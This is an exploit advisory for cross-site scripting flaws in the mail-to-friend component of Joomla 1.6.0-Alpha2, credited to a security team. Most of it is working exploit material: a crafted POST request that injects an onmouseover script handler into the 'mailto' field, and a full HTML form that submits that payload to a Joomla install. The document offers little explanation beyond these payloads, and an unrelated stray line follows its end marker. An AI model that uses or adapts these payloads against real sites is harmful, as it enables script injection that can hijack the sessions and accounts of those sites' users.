# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities # Date: 2010-05-02 # Author: mega-itec.com # Software Link: http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip # Version: 1.6.0-alpha2 # Tested on: [relevant os] # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities Author = mega-itec security team Contact = securite@mega-itec.com [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = Joomla Vendor = Joomla Vendor Website = http://www.joomla.org/ Affected Version(s) = 1.6.0-Alpha2 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> #1 Vulnerability Type = XSS ( POST ) mailto,subject,from,sender Example URI = option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode link with base 64 >> #2 html code exploit : <form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php" name="mailtoForm" method="post"> <div style="padding: 10px;"> <div style="text-align:right"> <a href="javascript: void window.close()"> Close Window <img src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png" border="0" alt="" title="" /></a> </div> <h2> E-mail this link to a friend. </h2> <p> E-mail to: <br /> <input type="text" name="mailto" class="inputbox" size="25" value="�" onmouseover=prompt(406426661849)//"/> </p> <p> Sender: <br /> <input type="text" name="sender" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> Your E-mail: <br /> <input type="text" name="from" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> Subject: <br /> <input type="text" name="subject" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> <button class="button" onclick="return submitbutton('send');"> Send </button> <button class="button" onclick="window.close();return false;"> Cancel </button> </p> </div> <input type="hidden" name="layout" value="default" /> <input type="hidden" name="option" value="com_mailto" /> <input type="hidden" name="task" value="send" /> <input type="hidden" name="tmpl" value="component" /> <input type="hidden" name="link" value="encode you link with base64" /> <input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1" /></form> [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Misc mega-itec.com ::: mega-itec security team [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
体验盒子